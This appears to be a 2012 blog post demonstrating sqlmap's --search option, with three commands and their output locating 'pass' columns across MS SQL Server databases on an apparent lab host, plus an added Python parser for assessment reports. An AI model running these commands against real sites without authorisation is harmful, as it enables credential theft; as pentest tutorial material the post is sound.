SQLMAP search
Posted on 2012-10-7 21:20:33
Search all databases for columns named pass

    root@Dis9Team:~# sqlmap -u "http://5.5.5.3/get.asp?id=1" --search -C 'pass'
    [01:14:22] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 2003
    web application technology: ASP.NET, Microsoft IIS 6.0, ASP
    back-end DBMS: Microsoft SQL Server 2000
    do you want sqlmap to consider provided column(s):
    [1] as LIKE column names
    [2] as exact column names (default)
    > 1
    [01:14:23] [INFO] fetching database names
    [01:14:23] [INFO] the SQL query used returns 5 entries
    [01:14:23] [INFO] resumed: "master"
    [01:14:23] [INFO] resumed: "model"
    [01:14:23] [INFO] resumed: "msdb"
    [01:14:23] [INFO] resumed: "pen"
    [01:14:23] [INFO] resumed: "tempdb"
    [01:14:24] [INFO] searching columns like 'pass' across all databases
    [01:14:24] [INFO] the SQL query used returns 2 entries
    [01:14:24] [INFO] retrieved: "syslogins"
    [01:14:24] [INFO] retrieved: "sysoledbusers"
    [01:14:24] [INFO] the SQL query used returns 1 entries
    [01:14:24] [INFO] retrieved: "users"
    Columns like 'pass' were found in the following databases:
    Database: pen
    Table: dbo.users
    [1 column]
    +--------+
    | Column |
    +--------+
    | pass   |
    +--------+

    Database: master
    Table: dbo.sysoledbusers
    [1 column]
    +--------+
    | Column |
    +--------+
    | pass   |
    +--------+

    Database: master
    Table: dbo.syslogins
    [1 column]
    +--------+
    | Column |
    +--------+
    | pass   |
    +--------+

    do you want to dump entries? [Y/n]

Search within a specified database

    root@Dis9Team:~# sqlmap -u "http://5.5.5.3/get.asp?id=1" --search -D pen -C 'pass'
    [01:15:49] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 2003
    web application technology: ASP.NET, Microsoft IIS 6.0, ASP
    back-end DBMS: Microsoft SQL Server 2000
    do you want sqlmap to consider provided column(s):
    [1] as LIKE column names
    [2] as exact column names (default)
    > 1
    [01:15:49] [INFO] searching columns like 'pass' in database 'pen'
    [01:15:49] [INFO] the SQL query used returns 1 entries
    [01:15:49] [INFO] resumed: "users"
    Columns like 'pass' were found in the following databases:
    Database: pen
    Table: dbo.users
    [1 column]
    +--------+
    | Column |
    +--------+
    | pass   |
    +--------+

    do you want to dump entries? [Y/n]

Search within a specified database and table

    root@Dis9Team:~# sqlmap -u "http://5.5.5.3/get.asp?id=1" --search -D pen -T dbo.users -C 'pass'
    [01:16:55] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 2003
    web application technology: ASP.NET, Microsoft IIS 6.0, ASP
    back-end DBMS: Microsoft SQL Server 2000
    do you want sqlmap to consider provided column(s):
    [1] as LIKE column names
    [2] as exact column names (default)
    > 1
    [01:16:56] [INFO] searching columns like 'pass' for table 'dbo.users' in database 'pen'
    [01:16:56] [INFO] the SQL query used returns 1 entries
    [01:16:56] [INFO] retrieved: "users"
    Columns like 'pass' were found in the following databases:
    Database: pen
    Table: dbo.users
    [1 column]
    +--------+
    | Column |
    +--------+
    | pass   |
    +--------+
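
An added example, not part of the original post: a small Python parser that turns the "Database / Table / Column" report blocks shown above into structured findings for an assessment report, and separates hits in SQL Server's system databases from hits in application databases such as pen. The names parse_search_report, application_hits and SYSTEM_DBS are hypothetical, and the sample text is constructed from the layout in the post.

```python
import re

# SQL Server's built-in system databases; hits there are catalog tables.
SYSTEM_DBS = {"master", "model", "msdb", "tempdb"}

# Constructed sample: two report blocks in the layout shown in the post.
SAMPLE = """\
Columns like 'pass' were found in the following databases:
Database: pen
Table: dbo.users
[1 column]
+--------+
| Column |
+--------+
| pass   |
+--------+

Database: master
Table: dbo.sysoledbusers
[1 column]
+--------+
| Column |
+--------+
| pass   |
+--------+
"""

def parse_search_report(text):
    """Return (database, table, column) tuples from a --search report."""
    findings, db, table, header_seen = [], None, None, False
    for raw in text.splitlines():
        # Drop a forum-style "27. " line-number prefix if one is present.
        line = re.sub(r"^\s*\d+\.\s+", "", raw).strip()
        if line.startswith("Database:"):
            db, table = line.split(":", 1)[1].strip(), None
        elif line.startswith("Table:"):
            table, header_seen = line.split(":", 1)[1].strip(), False
        elif line.startswith("|") and line.endswith("|") and db and table:
            cell = line.strip("|").split("|")[0].strip()
            if header_seen:
                findings.append((db, table, cell))
            header_seen = True  # first boxed row is the "Column" header
    return findings

def application_hits(findings):
    """Keep only findings outside the system databases."""
    return [f for f in findings if f[0] not in SYSTEM_DBS]
```

Filtering out master, model, msdb and tempdb leaves pen.dbo.users.pass, the application table whose password storage is the finding worth reporting.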



